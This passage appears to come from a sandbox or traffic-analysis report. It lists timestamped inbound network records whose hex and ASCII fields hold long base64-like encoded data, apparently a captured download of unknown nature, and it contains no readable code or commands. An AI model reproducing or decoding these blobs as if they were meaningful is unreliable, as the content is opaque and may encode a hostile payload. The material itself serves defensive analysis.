bNVQNvnAHZBi3rgRYm/ttSL2jdaOU6BX2bGaVqhx190lu8/5HYmmCfnMep/4LnorGRFbALnKfgfFJw7xu8laGj7QrEjZCWJdFTH6aa1nZ6b6AaGczhGWRvR/yDbTn/WsCJGWeW/GnUJ3TCIWMRGqjuK8nPblU9wBRxGgoqwoK8I+k6LW3xaUYsawIFHm4EKN/Qhen5mQqEA4g4y0+u/a1pmTqgL7UoRWGbHpbndMMMoNXw0zQtp6Kn00rNu5wRY
2023-03-02 16:18:25 UTC	97	IN	Data Raw: 50 77 44 79 71 33 61 32 42 7a 59 49 45 7a 62 52 56 72 6a 48 54 4e 6a 76 35 69 42 72 4e 7a 47 61 64 50 6a 75 57 74 61 5a 70 62 51 49 58 52 42 46 74 75 50 62 6b 51 77 41 55 61 59 5a 55 70 6f 4b 74 75 6e 31 46 34 52 77 6b 35 77 72 4c 74 67 42 76 46 63 4a 34 37 34 6e 4e 71 44 31 41 47 79 6b 31 6f 2f 66 38 79 71 69 7a 4a 63 7a Data Ascii: PwDyq3a2BzYIEzbRVrjHTNjv5iBrNzGadPjuWtaZpbQIXRBFtuPbkQwAUaYZUpoKtun1F4Rwk5wrLtgBvFcJ474nNqD1AGyk1o/f8yqizJcz
2023-03-02 16:18:25 UTC	97	IN	Data Raw: 53 36 58 4d 33 63 4e 2f 31 4f 7a 53 32 67 57 32 57 43 56 30 78 6f 4a 36 77 2f 62 6c 50 7a 31 36 38 35 47 67 34 55 67 78 34 7a 62 6c 46 76 46 78 34 39 4f 59 37 46 6f 34 63 47 37 34 2f 52 46 56 67 4c 67 61 51 43 71 4a 49 70 61 32 66 4a 51 33 78 6a 46 61 56 72 74 51 68 64 59 5a 73 64 6d 33 6d 4c 4c 61 56 71 68 51 6d 6c 59 5a 73 65 41 4e 49 59 6c 70 62 56 61 55 74 47 72 45 6a 4c 75 4d 44 5a 2f 63 48 55 32 56 46 79 66 43 52 43 4a 62 2b 4c 4f 51 6b 4e 54 4f 59 74 79 38 76 4c 50 38 65 49 35 34 46 71 45 52 6d 35 46 5a 70 2f 6f 33 32 62 46 61 56 72 48 54 50 4e 74 35 33 4a 70 57 47 62 48 4d 56 52 42 54 36 57 74 4f 43 67 79 48 41 69 61 52 5a 50 61 46 35 66 42 52 64 31 77 45 4f 64 79 61 56 68 6d 78 35 75 73 4f 35 56 53 33 32 62 46 61 56 70 70 51 2f 74 52 5a 73 65 75 Data Ascii: S6XM3cN/1OzS2gW2WCV0xoJ6w/blPz1685Gg4Ugx4zblFvFx49OY7Fo4cG74/RFVgLgaQCqJIpa2fJQ3xjFaVrtQhdYZsdm3mLLaVqhQmlYZseANIYlpbVaUtGrEjLuMDZ/cHU2VFyfCRCJb+LOQkNTOYty8vLP8eI54FqERm5FZp/o32bFaVrHTPNt53JpWGbHMVRBT6WtOCgyHAiaRZPaF5fBRd1wEOdyaVhmx5usO5VS32bFaVppQ/tRZseu
2023-03-02 16:18:25 UTC	98	IN	Data Raw: 61 64 6a 6f 74 49 50 6a 66 49 61 52 72 75 53 34 47 4b 51 45 2b 31 54 41 45 61 70 6d 30 6e 71 31 6b 34 6a 5a 2b 57 46 5a 70 2f 6f 73 55 4a 65 33 49 59 31 54 50 52 4e 5a 4d 64 70 6e 65 50 44 61 46 70 6d 48 69 4d 69 79 6b 62 63 58 6d 66 48 61 59 64 52 53 61 6a 62 30 38 4e 6f 57 6d 62 7a 67 4e 61 5a 6b 64 65 66 76 4c 76 6d 32 35 42 63 6c 4f 34 6d 52 70 38 6b 38 4b 44 6f 32 35 41 43 44 48 30 4f 52 70 2b 2f 73 6b 39 50 30 33 41 7a 62 74 62 4c 4f 4c 67 51 68 52 34 70 5a 7a 5a 56 58 6c 6f 34 52 73 52 65 5a 38 64 70 61 76 4b 39 2b 39 6d 6c 77 2b 44 66 79 38 5a 70 57 75 38 66 4f 64 48 6a 61 6d 68 61 5a 6a 6a 65 57 6d 37 48 61 62 4a 79 51 57 68 61 37 30 4c 77 57 32 62 48 30 5a 4a 52 77 68 34 4e 32 52 4f 73 38 30 64 47 6e 73 51 77 65 50 33 62 6b 64 67 68 6b 50 64 47 Data Ascii: adjotIPjfIaRruS4GKQE+1TAEapm0nq1k4jZ+WFZp/osUJe3IY1TPRNZMdpnePDaFpmHiMiykbcXmfHaYdRSajb08NoWmbzgNaZkdefvLvm25BclO4mRp8k8KDo25ACDH0ORp+/sk9P03AzbtbLOLgQhR4pZzZVXlo4RsReZ8dpavK9+9mlw+Dfy8ZpWu8fOdHjamhaZjjeWm7HabJyQWha70LwW2bH0ZJRwh4N2ROs80dGnsQweP3bkdghkPdG
2023-03-02 16:18:25 UTC	100	IN	Data Raw: 2b 44 50 71 63 5a 70 57 6a 64 2b 4e 52 74 58 75 2b 69 72 50 4b 2b 58 79 2b 63 47 4e 74 72 72 39 4f 69 72 71 6d 34 5a 55 4f 63 32 77 46 70 4b 37 4f 42 6a 6b 32 48 4e 70 73 57 4f 64 51 54 45 4c 48 31 43 4f 73 63 77 34 47 6a 46 68 47 33 6e 4e 55 66 59 73 61 6b 36 34 51 78 70 34 30 44 6e 4e 47 72 74 31 6e 54 6f 73 66 6e 31 50 49 76 6e 4e 4d 49 43 78 66 7a 6f 71 51 64 35 4c 72 62 76 7a 49 6f 33 53 63 63 79 32 36 54 52 64 6b 32 77 6b 64 63 31 4f 69 4b 57 32 34 69 79 4a 2b 46 4b 52 71 2b 4f 77 78 4e 41 32 35 43 2f 6d 4b 6c 31 52 71 38 51 32 44 56 35 43 2f 70 4f 69 46 4e 58 57 67 39 6a 70 37 78 72 75 4f 6f 30 6c 31 72 69 48 54 42 69 72 5a 6e 6f 73 46 42 59 4f 48 57 71 4b 50 4d 72 73 77 72 30 76 62 50 4b 55 49 72 74 55 71 5a 62 5a 73 64 6d 33 31 72 44 61 56 6f 30 Data Ascii: +DPqcZpWjd+NRtXu+irPK+Xy+cGNtrr9Oirqm4ZUOc2wFpK7OBjk2HNpsWOdQTELH1COscw4GjFhG3nNUfYsak64Qxp40DnNGrt1nTosfn1PIvnNMICxfzoqQd5LrbvzIo3Sccy26TRdk2wkdc1OiKW24iyJ+FKRq+OwxNA25C/mKl1Rq8Q2DV5C/pOiFNXWg9jp7xruOo0l1riHTBirZnosFBYOHWqKPMrswr0vbPKUIrtUqZbZsdm31rDaVo0
2023-03-02 16:18:25 UTC	101	IN	Data Raw: 6a 70 4e 78 4f 63 45 4e 34 6b 6f 62 2b 69 70 2b 6e 4f 4a 71 7a 64 62 34 4c 74 6e 33 76 54 66 6e 37 6c 72 74 68 74 61 49 63 31 2f 78 2b 32 76 50 36 47 65 6d 4d 35 2f 4d 71 58 54 33 32 68 61 5a 69 2f 75 39 57 66 48 50 2b 51 79 75 79 48 55 35 7a 48 33 79 57 66 5a 36 4b 7a 4e 62 6d 36 32 35 7a 46 32 33 69 34 42 36 4a 7a 6b 2b 5a 41 66 4e 46 76 67 75 47 2f 31 39 4e 2b 75 75 47 47 7a 46 62 46 4a 7a 73 43 4c 5a 70 4e 6d 6f 65 79 62 50 4e 46 2b 73 57 2f 5a 39 45 55 77 2f 2f 76 5a 6c 5a 67 33 6c 6f 66 31 67 54 4b 69 57 59 73 49 4e 6e 39 76 6c 61 65 52 62 4c 57 70 73 6d 4a 66 37 66 58 72 6e 6d 4e 48 52 78 79 2f 54 6d 47 7a 6d 77 6f 47 30 34 39 54 31 50 56 6d 6e 2b 68 32 51 6c 67 5a 68 6a 55 4c 67 43 46 50 6e 6a 44 65 50 4d 37 7a 33 64 52 47 58 58 34 44 74 61 6b 61 Data Ascii: jpNxOcEN4kob+ip+nOJqzdb4Ltn3vTfn7lrthtaIc1/x+2vP6GemM5/MqXT32haZi/u9WfHP+QyuyHU5zH3yWfZ6KzNbm625zF23i4B6Jzk+ZAfNFvguG/19N+uuGGzFbFJzsCLZpNmoeybPNF+sW/Z9EUw//vZlZg3lof1gTKiWYsINn9vlaeRbLWpsmJf7fXrnmNHRxy/TmGzmwoG049T1PVmn+h2QlgZhjULgCFPnjDePM7z3dRGXX4Dtaka
2023-03-02 16:18:25 UTC	102	IN	Data Raw: 66 35 42 4d 2b 4c 6e 4e 4b 64 74 72 5a 4c 6f 6d 61 76 31 6d 2f 7a 76 33 49 43 73 37 43 76 2b 6a 4e 74 75 47 6c 6f 39 43 35 32 4b 5a 6b 45 79 5a 53 39 52 4f 4e 72 6d 73 46 4d 49 4e 2f 39 63 74 5a 36 61 2f 46 38 51 49 48 50 2b 4e 6e 39 42 46 5a 39 4f 58 45 45 31 4e 42 64 76 62 4e 57 66 54 46 50 2b 5a 36 61 48 54 6e 6d 73 50 64 52 61 5a 4c 32 41 52 5a 49 32 47 62 50 47 51 68 69 56 57 6a 34 45 4f 2b 43 47 63 71 79 47 35 77 57 76 76 72 49 30 36 4c 41 6c 72 74 4b 6c 35 7a 57 4d 38 32 61 2b 36 4c 44 67 58 37 62 7a 37 38 57 46 6d 50 61 48 75 42 4e 6d 6e 54 76 67 4f 6b 37 30 49 65 63 31 70 41 65 52 54 65 69 59 43 65 7a 38 56 4f 2f 4e 68 6f 38 48 5a 51 48 62 6f 38 63 7a 70 52 4c 6a 62 51 76 66 51 47 62 59 68 55 61 59 34 70 61 71 31 4e 75 58 4b 76 34 4d 65 6b 61 6f Data Ascii: f5BM+LnNKdtrZLomav1m/zv3ICs7Cv+jNtuGlo9C52KZkEyZS9RONrmsFMIN/9ctZ6a/F8QIHP+Nn9BFZ9OXEE1NBdvbNWfTFP+Z6aHTnmsPdRaZL2ARZI2GbPGQhiVWj4EO+CGcqyG5wWvvrI06LAlrtKl5zWM82a+6LDgX7bz78WFmPaHuBNmnTvgOk70Iec1pAeRTeiYCez8VO/Nho8HZQHbo8czpRLjbQvfQGbYhUaY4paq1NuXKv4Mekao
2023-03-02 16:18:25 UTC	103	IN	Data Raw: 4a 39 7a 34 46 78 57 31 31 49 4c 70 30 7a 71 54 47 65 56 46 35 33 54 72 77 4a 38 66 56 50 4c 4d 67 72 74 51 6d 42 59 5a 73 65 42 76 52 6a 47 61 51 4c 76 57 6d 5a 59 5a 73 66 67 6d 61 6f 71 68 70 54 61 57 34 7a 78 4e 55 7a 30 56 57 54 48 61 62 4c 74 72 47 68 61 37 31 49 74 57 47 62 48 34 67 35 43 7a 36 57 35 33 46 6a 77 51 2b 55 39 59 39 48 7a 67 32 74 61 5a 73 6a 6d 66 47 58 48 61 51 7a 59 45 58 2b 35 7a 30 61 66 6f 4e 38 37 52 64 75 67 45 7a 6d 36 48 45 35 66 72 4a 47 51 49 6c 6f 50 63 52 41 6f 64 45 4f 62 59 63 6d 53 33 56 6f 34 6c 4e 4c 41 39 52 45 58 32 34 32 68 55 6c 52 50 52 70 70 75 50 67 38 38 30 32 30 31 43 48 74 49 66 73 35 6a 46 48 56 52 6b 4e 5a 30 72 38 37 43 6a 73 68 66 53 38 63 79 4d 72 56 62 76 2b 36 71 4c 4c 63 63 47 4e 66 32 65 54 6d 59 Data Ascii: J9z4FxW11ILp0zqTGeVF53TrwJ8fVPLMgrtQmBYZseBvRjGaQLvWmZYZsfgmaoqhpTaW4zxNUz0VWTHabLtrGha71ItWGbH4g5Cz6W53FjwQ+U9Y9Hzg2taZsjmfGXHaQzYEX+5z0afoN87RdugEzm6HE5frJGQIloPcRAodEObYcmS3Vo4lNLA9REX242hUlRPRppuPg880201CHtIfs5jFHVRkNZ0r87CjshfS8cyMrVbv+6qLLccGNf2eTmY
2023-03-02 16:18:25 UTC	104	IN	Data Raw: 75 51 78 5a 4d 64 70 43 39 2b 77 30 78 4b 64 52 71 68 67 64 55 57 61 32 35 63 77 35 70 6f 72 52 71 6a 67 32 7a 49 31 30 33 63 71 38 53 79 77 32 47 6b 44 37 59 74 4e 55 6a 42 35 71 62 41 2f 4b 75 69 30 34 66 42 51 65 4f 63 42 72 68 65 35 38 7a 72 47 37 79 52 6f 61 66 76 2b 73 79 6c 69 4e 7a 52 70 48 45 79 58 63 36 42 51 51 4f 66 70 59 51 62 38 69 6b 42 71 57 67 43 55 44 2b 46 53 36 77 38 42 50 53 78 35 4f 75 36 53 6d 59 4b 39 46 49 49 36 37 70 4b 5a 67 72 30 55 67 67 54 6c 50 6e 33 52 36 36 78 72 57 6d 62 49 35 6d 6c 69 78 32 6d 57 69 44 6d 57 4c 30 43 41 5a 4f 35 5a 72 44 6e 69 66 4b 4f 75 4b 6c 50 59 75 2f 47 42 38 68 4e 58 7a 31 70 63 4a 64 77 43 59 77 7a 36 54 6f 39 62 59 46 72 73 6b 52 58 43 68 4f 6c 68 73 36 52 61 4e 53 77 73 56 79 59 74 67 50 41 42 Data Ascii: uQxZMdpC9+w0xKdRqhgdUWa25cw5porRqjg2zI103cq8Syw2GkD7YtNUjB5qbA/Kui04fBQeOcBrhe58zrG7yRoafv+syliNzRpHEyXc6BQQOfpYQb8ikBqWgCUD+FS6w8BPSx5Ou6SmYK9FII67pKZgr0UggTlPn3R66xrWmbI5mlix2mWiDmWL0CAZO5ZrDnifKOuKlPYu/GB8hNXz1pcJdwCYwz6To9bYFrskRXChOlhs6RaNSwsVyYtgPAB
2023-03-02 16:18:25 UTC	106	IN	Data Raw: 56 5a 32 31 2b 63 45 2b 4e 6f 41 31 7a 6e 47 37 79 64 67 51 76 75 68 55 49 6f 64 7a 6f 44 6d 50 33 43 47 6c 37 79 32 45 46 72 69 4f 44 48 7a 76 4c 46 63 34 54 31 4f 6b 41 76 74 53 75 6c 59 5a 73 63 35 34 76 6c 30 46 4a 52 54 6b 4d 7a 58 33 76 4b 68 54 4a 61 78 34 46 71 4a 77 6f 45 73 39 49 62 4d 57 6a 35 4f 31 46 56 6b 78 32 6e 54 6f 5a 54 53 65 6d 2b 30 2b 4e 75 56 71 52 4c 47 6f 45 61 61 67 7a 6d 6a 76 39 75 56 6a 51 6a 5a 4d 55 61 71 65 64 55 77 51 4e 4e 6c 4a 4d 43 48 5a 70 77 2b 43 64 33 37 31 56 65 64 52 70 72 77 7a 47 74 36 32 35 58 54 31 57 6e 50 52 70 70 4d 53 52 46 53 32 34 31 54 37 42 34 63 54 6e 4b 75 70 36 69 67 52 52 65 38 46 67 30 62 42 6c 41 46 4d 4d 63 79 30 64 76 49 61 31 70 6d 4c 78 63 34 5a 38 65 6c 74 4f 75 56 75 4e 70 73 52 6d 6f 4b Data Ascii: VZ21+cE+NoA1znG7ydgQvuhUIodzoDmP3CGl7y2EFriODHzvLFc4T1OkAvtSulYZsc54vl0FJRTkMzX3vKhTJax4FqJwoEs9IbMWj5O1FVkx2nToZTSem+0+NuVqRLGoEaagzmjv9uVjQjZMUaqedUwQNNlJMCHZpw+Cd371VedRprwzGt625XT1WnPRppMSRFS241T7B4cTnKup6igRRe8Fg0bBlAFMMcy0dvIa1pmLxc4Z8eltOuVuNpsRmoK
2023-03-02 16:18:25 UTC	107	IN	Data Raw: 47 62 48 34 4a 77 77 6b 4e 61 42 67 6d 65 51 32 36 48 54 67 77 70 73 52 70 36 72 70 61 62 4e 32 35 48 5a 5a 4d 72 42 54 6c 61 77 74 73 38 52 35 75 5a 4f 4b 4f 61 6e 30 71 64 61 4f 55 7a 63 51 57 54 48 61 62 49 32 6d 47 68 61 71 69 72 62 36 53 7a 56 46 58 36 6b 7a 32 6b 4c 33 79 61 2b 65 61 46 47 71 48 54 36 57 6f 54 62 6c 30 31 64 6f 62 68 47 67 4e 38 6d 2f 51 50 54 64 7a 55 38 4c 68 66 59 78 49 4a 45 68 30 42 73 52 75 6c 48 6d 4d 61 6a 68 4f 7a 75 78 7a 41 4d 32 4e 66 47 5a 76 6c 47 6e 77 37 41 2b 73 44 62 6b 4c 49 37 30 44 4e 47 72 35 58 43 73 2f 58 54 65 44 46 66 77 69 38 6c 4d 42 50 61 59 58 71 4a 34 50 77 6d 57 56 50 48 4e 36 55 53 34 32 30 4e 32 63 39 4d 6f 6e 46 47 6e 6f 47 43 64 2b 2f 62 69 52 53 70 45 76 65 58 39 64 4f 47 7a 6c 48 48 58 77 38 53 Data Ascii: GbH4JwwkNaBgmeQ26HTgwpsRp6rpabN25HZZMrBTlawts8R5uZOKOan0qdaOUzcQWTHabI2mGhaqirb6SzVFX6kz2kL3ya+eaFGqHT6WoTbl01dobhGgN8m/QPTdzU8LhfYxIJEh0BsRulHmMajhOzuxzAM2NfGZvlGnw7A+sDbkLI70DNGr5XCs/XTeDFfwi8lMBPaYXqJ4PwmWVPHN6US420N2c9MonFGnoGCd+/biRSpEveX9dOGzlHHXw8S
2023-03-02 16:18:25 UTC	108	IN	Data Raw: 66 79 71 4c 66 51 74 4e 77 52 31 43 45 73 53 67 2b 35 31 48 77 4f 79 6e 4c 6c 6f 57 75 39 53 49 56 68 6d 78 7a 72 68 48 72 73 36 51 75 63 30 54 2f 74 7a 6d 2b 69 70 31 30 36 6a 2b 4f 63 30 51 59 64 30 45 2b 69 78 6f 55 37 33 61 4f 2f 30 68 2b 6c 72 4a 2b 48 6a 52 67 68 70 41 65 38 46 4f 39 48 7a 6a 32 74 61 5a 67 75 5a 45 75 4c 39 41 51 57 65 4d 35 32 51 7a 75 4c 4b 4a 46 46 37 4b 39 55 45 68 6f 48 41 2b 63 64 70 30 39 73 5a 61 46 70 6d 65 4d 76 53 2f 4f 77 35 34 6b 52 58 65 34 70 54 36 57 52 45 56 38 4b 64 4f 4a 58 5a 34 46 71 4e 76 65 4b 4f 64 64 77 5a 51 6d 63 61 39 46 6f 2b 52 70 35 58 32 64 59 76 32 36 48 47 41 51 6d 56 52 6f 62 31 2b 52 6b 4a 44 65 31 36 74 31 74 6d 78 7a 72 68 31 4d 79 78 68 2b 63 30 4d 66 51 71 59 65 69 5a 68 53 49 6c 72 2b 63 73 Data Ascii: fyqLfQtNwR1CEsSg+51HwOynLloWu9SIVhmxzrhHrs6Quc0T/tzm+ip106j+Oc0QYd0E+ixoU73aO/0h+lrJ+HjRghpAe8FO9Hzj2taZguZEuL9AQWeM52QzuLKJFF7K9UEhoHA+cdp09sZaFpmeMvS/Ow54kRXe4pT6WREV8KdOJXZ4FqNveKOddwZQmca9Fo+Rp5X2dYv26HGAQmVRob1+RkJDe16t1tmxzrh1Myxh+c0MfQqYeiZhSIlr+cs
2023-03-02 16:18:25 UTC	109	IN	Data Raw: 58 52 66 77 52 39 6f 52 52 72 66 31 43 72 69 6b 7a 72 52 2b 39 74 72 57 6d 61 51 31 72 4d 54 5a 54 62 62 6b 51 50 74 6b 77 5a 47 72 6f 6c 70 55 36 6b 4b 2b 6b 36 4a 55 31 35 61 37 4b 49 57 78 59 42 33 6f 66 49 49 66 70 70 39 52 46 72 69 44 44 45 38 34 77 63 32 73 6f 71 51 61 46 6f 77 65 66 4e 77 4a 39 44 6f 6e 49 76 52 4e 35 76 6e 4d 64 62 6a 74 34 6e 6f 74 46 34 2f 4a 38 7a 76 30 5a 31 2f 5a 75 38 6e 57 30 39 73 33 44 44 48 71 4d 47 41 5a 70 6b 2f 35 47 2b 6d 37 37 6e 6e 4d 61 53 42 30 6f 2f 6f 72 47 43 2f 79 32 62 6e 4d 55 67 6c 54 78 2f 6f 72 49 56 37 30 42 55 31 57 2b 43 35 5a 2f 54 30 50 4f 4d 58 47 56 69 54 6a 6a 2b 66 54 42 73 6e 76 49 78 71 43 6e 73 64 78 2b 79 54 50 66 6f 34 73 36 66 66 4e 7a 4c 69 39 6e 6c 6b 4e 58 78 35 45 72 50 78 36 4b 6b 66 Data Ascii: XRfwR9oRRrf1CrikzrR+9trWmaQ1rMTZTbbkQPtkwZGrolpU6kK+k6JU15a7KIWxYB3ofIIfpp9RFriDDE84wc2soqQaFowefNwJ9DonIvRN5vnMdbjt4notF4/J8zv0Z1/Zu8nW09s3DDHqMGAZpk/5G+m77nnMaSB0o/orGC/y2bnMUglTx/orIV70BU1W+C5Z/T0POMXGViTjj+fTBsnvIxqCnsdx+yTPfo4s6ffNzLi9nlkNXx5ErPx6Kkf
2023-03-02 16:18:25 UTC	111	IN	Data Raw: 43 31 54 46 6a 7a 32 78 61 79 30 51 30 4a 74 2f 5a 77 42 4e 51 66 4c 36 77 7a 59 4d 51 4f 61 2f 45 61 66 43 58 65 54 64 4e 75 49 59 68 50 4f 34 5a 62 31 30 34 66 47 57 4d 64 66 47 52 4e 59 69 6a 4d 75 53 6a 68 30 61 62 46 53 68 74 67 37 38 33 58 32 67 6b 75 79 38 76 69 32 67 6b 58 6d 6f 36 48 73 75 57 6f 51 48 51 59 35 6b 41 59 62 31 36 62 38 36 50 6b 66 52 43 2f 39 5a 62 6b 66 53 6e 75 73 50 4f 4d 6b 5a 59 30 53 6d 7a 59 4e 43 5a 36 66 6d 54 71 5a 36 47 35 43 53 2f 57 51 73 70 44 57 47 2f 6e 68 32 4e 75 52 32 66 55 79 2f 30 61 65 77 47 53 50 34 74 75 52 2b 33 66 56 4a 30 61 47 6f 33 6c 4f 69 39 4e 70 4c 79 77 54 66 6f 77 67 67 6d 4a 2f 4a 6c 6f 35 52 6b 56 2b 6c 67 42 53 63 2b 66 72 54 61 35 54 54 45 53 6c 38 31 39 70 57 6d 59 4f 71 67 72 65 38 45 77 77 Data Ascii: C1TFjz2xay0Q0Jt/ZwBNQfL6wzYMQOa/EafCXeTdNuIYhPO4Zb104fGWMdfGRNYijMuSjh0abFShtg783X2gkuy8vi2gkXmo6HsuWoQHQY5kAYb16b86PkfRC/9ZbkfSnusPOMkZY0SmzYNCZ6fmTqZ6G5CS/WQspDWG/nh2NuR2fUy/0aewGSP4tuR+3fVJ0aGo3lOi9NpLywTfowggmJ/Jlo5RkV+lgBSc+frTa5TTESl819pWmYOqgre8Eww
2023-03-02 16:18:25 UTC	112	IN	Data Raw: 42 41 41 68 71 4c 6e 4b 66 33 4e 54 52 50 67 52 4a 4b 48 43 50 56 41 6c 72 2f 42 45 45 70 4b 43 74 36 77 61 51 54 74 53 73 6c 61 5a 73 65 6c 75 2b 76 52 30 32 69 51 31 46 43 79 4d 5a 46 6f 57 6a 64 2b 47 75 4b 44 75 65 69 7a 59 67 6c 35 49 75 63 32 42 72 47 79 77 54 72 47 37 79 52 6f 55 66 75 68 37 49 41 62 77 6f 51 41 66 77 6f 6c 57 75 49 65 4d 6d 4b 6c 6e 75 44 66 75 73 64 70 57 71 6f 6f 7a 5a 4e 77 4e 30 63 50 6d 43 6a 69 31 38 62 48 61 56 72 63 6f 2b 73 41 46 53 39 6b 44 47 66 48 4f 4f 4d 63 62 31 36 6a 35 79 37 4d 31 77 72 4f 36 4b 76 6a 67 4d 59 51 35 77 62 5a 2b 50 32 64 34 45 75 56 54 4b 44 31 64 69 6f 42 48 4a 62 74 58 31 57 50 68 6d 69 33 39 79 6c 4e 57 6a 39 4f 37 4c 70 6d 78 32 6e 52 47 2b 63 34 34 78 41 58 54 64 6e 6e 4e 73 73 6f 36 49 7a 6f Data Ascii: BAAhqLnKf3NTRPgRJKHCPVAlr/BEEpKCt6waQTtSslaZselu+vR02iQ1FCyMZFoWjd+GuKDueizYgl5Iuc2BrGywTrG7yRoUfuh7IAbwoQAfwolWuIeMmKlnuDfusdpWqoozZNwN0cPmCji18bHaVrco+sAFS9kDGfHOOMcb16j5y7M1wrO6KvjgMYQ5wbZ+P2d4EuVTKD1dioBHJbtX1WPhmi39ylNWj9O7Lpmx2nRG+c44xAXTdnnNsso6Izo
2023-03-02 16:18:25 UTC	113	IN	Data Raw: 39 48 7a 6d 6d 74 61 5a 70 62 51 71 32 47 59 45 39 75 6e 53 4b 70 7a 6f 6b 61 6f 32 6c 4b 77 71 4e 4e 58 4c 39 39 73 75 47 58 77 6d 39 64 5a 6b 56 6f 2f 54 76 54 2f 5a 38 64 70 30 66 76 54 61 46 70 6d 6b 64 65 2f 73 69 39 55 32 36 41 2f 77 63 36 52 52 70 2b 46 6e 42 6f 4a 32 36 41 35 45 51 58 4d 54 6e 2b 30 2b 4e 57 6f 35 Data Ascii: 9HzmmtaZpbQq2GYE9unSKpzokao2lKwqNNXL99suGXwm9dZkVo/TvT/Z8dp0fvTaFpmkde/si9U26A/wc6RRp+FnBoJ26A5EQXMTn+0+NWo5
2023-03-02 16:18:25 UTC	113	IN	Data Raw: 65 75 4a 44 31 6f 34 6c 4f 4c 48 77 38 5a 70 57 6a 5a 2f 61 57 2b 4c 68 31 7a 39 6d 6f 6b 4d 64 38 45 50 79 6e 38 33 57 2b 43 37 5a 38 62 30 33 35 57 79 59 71 73 31 2b 59 55 69 58 2b 4e 72 76 64 4f 61 53 2b 64 6f 4f 30 38 38 5a 76 2b 71 41 31 38 47 4d 61 58 54 46 32 6c 61 5a 67 75 65 41 4e 71 73 6f 6e 34 44 2b 37 63 46 77 45 52 32 64 6f 36 4f 56 4c 49 48 54 57 68 61 34 77 64 6d 33 72 66 4a 61 56 72 76 51 6f 46 61 5a 73 63 36 34 62 79 47 68 59 4c 6e 4e 45 73 31 52 62 66 6f 73 5a 37 71 70 76 49 33 57 2b 43 37 5a 39 37 30 33 71 2b 2f 62 4c 52 35 4f 6d 71 63 69 64 33 54 57 75 49 4e 4d 4e 2b 38 6e 41 46 78 39 48 6d 4b 32 30 72 6a 6c 62 54 49 33 71 57 34 31 73 64 38 71 68 6c 47 58 58 37 67 49 44 7a 72 4e 58 78 6a 62 52 6d 46 36 4b 6e 76 36 4f 79 76 35 77 51 6d Data Ascii: euJD1o4lOLHw8ZpWjZ/aW+Lh1z9mokMd8EPyn83W+C7Z8b035WyYqs1+YUiX+NrvdOaS+doO088Zv+qA18GMaXTF2laZgueANqson4D+7cFwER2do6OVLIHTWha4wdm3rfJaVrvQoFaZsc64byGhYLnNEs1RbfosZ7qpvI3W+C7Z9703q+/bLR5Omqcid3TWuINMN+8nAFx9HmK20rjlbTI3qW41sd8qhlGXX7gIDzrNXxjbRmF6Knv6Oyv5wQm
2023-03-02 16:18:25 UTC	114	IN	Data Raw: 69 34 42 52 6f 65 41 48 75 2f 57 30 31 67 6f 74 73 70 6d 68 39 47 6b 5a 70 6d 6c 72 42 57 49 47 74 57 62 44 66 66 2b 63 34 65 75 65 4a 50 67 42 51 56 78 54 6e 48 53 36 30 52 6f 57 6d 5a 4e 49 56 37 6d 50 68 72 51 36 30 52 6f 57 6d 62 49 37 45 70 6e 78 32 6b 38 6f 59 64 73 6f 62 2b 51 31 6c 30 77 41 38 7a 62 6f 53 56 42 58 70 35 47 72 6b 33 6b 38 41 73 4a 2b 6b 36 4b 57 31 31 61 55 4b 6f 62 77 34 66 55 73 57 37 63 64 61 61 68 61 61 49 39 70 77 2f 6c 6a 61 67 50 32 35 6b 73 42 6c 58 6a 67 62 47 6b 6d 61 59 32 50 4f 65 33 62 46 65 47 6f 65 67 61 59 7a 54 6f 50 4f 65 76 62 50 58 71 41 53 6c 64 72 35 54 53 31 72 4f 2b 5a 39 75 56 69 4a 6e 47 4b 30 61 61 53 54 4d 54 4f 64 75 4e 2b 66 6d 62 6e 45 61 61 79 49 65 6f 63 51 72 36 54 6f 6c 54 66 6c 72 73 69 42 37 49 Data Ascii: i4BRoeAHu/W01gotspmh9GkZpmlrBWIGtWbDff+c4eueJPgBQVxTnHS60RoWmZNIV7mPhrQ60RoWmbI7Epnx2k8oYdsob+Q1l0wA8zboSVBXp5Grk3k8AsJ+k6KW11aUKobw4fUsW7cdaahaaI9pw/ljagP25ksBlXjgbGkmaY2POe3bFeGoegaYzToPOevbPXqASldr5TS1rO+Z9uViJnGK0aaSTMTOduN+fmbnEaayIeocQr6TolTflrsiB7I
2023-03-02 16:18:25 UTC	116	IN	Data Raw: 6a 6c 47 74 30 61 71 7a 62 48 71 6b 39 4e 64 4e 37 47 45 79 47 35 30 71 38 74 58 4b 49 7a 33 74 2b 57 68 74 69 75 41 57 6a 32 52 31 79 36 78 64 69 58 62 6b 44 79 32 63 68 35 47 72 35 30 4a 67 39 50 62 6b 4a 45 52 68 34 68 4f 58 37 65 39 71 58 7a 77 5a 70 6e 6f 71 2f 71 65 35 63 48 6e 42 71 61 53 30 68 73 34 30 65 75 77 61 31 70 6d 6b 64 65 70 37 2b 48 48 32 35 43 6f 70 55 35 78 52 70 38 6a 6b 73 36 33 32 35 41 69 32 47 45 42 54 6d 2b 30 36 33 7a 31 67 4a 4c 51 4a 46 6f 34 72 7a 5a 42 4b 57 49 2b 35 64 4c 64 2f 79 66 6e 4b 41 6f 63 62 64 2f 6f 72 54 63 53 34 7a 38 33 57 2b 43 37 62 2f 37 30 59 35 36 2f 61 36 7a 6c 37 77 53 43 4a 30 74 4e 72 67 36 67 77 50 30 51 46 7a 46 61 58 67 55 77 43 64 31 48 63 47 51 6a 52 70 4c 61 66 2f 6b 73 56 65 4d 73 75 71 53 5a Data Ascii: jlGt0aqzbHqk9NdN7GEyG50q8tXKIz3t+WhtiuAWj2R1y6xdiXbkDy2ch5Gr50Jg9PbkJERh4hOX7e9qXzwZpnoq/qe5cHnBqaS0hs40euwa1pmkdep7+HH25CopU5xRp8jks6325Ai2GEBTm+063z1gJLQJFo4rzZBKWI+5dLd/yfnKAocbd/orTcS4z83W+C7b/70Y56/a6zl7wSCJ0tNrg6gwP0QFzFaXgUwCd1HcGQjRpLaf/ksVeMsuqSZ
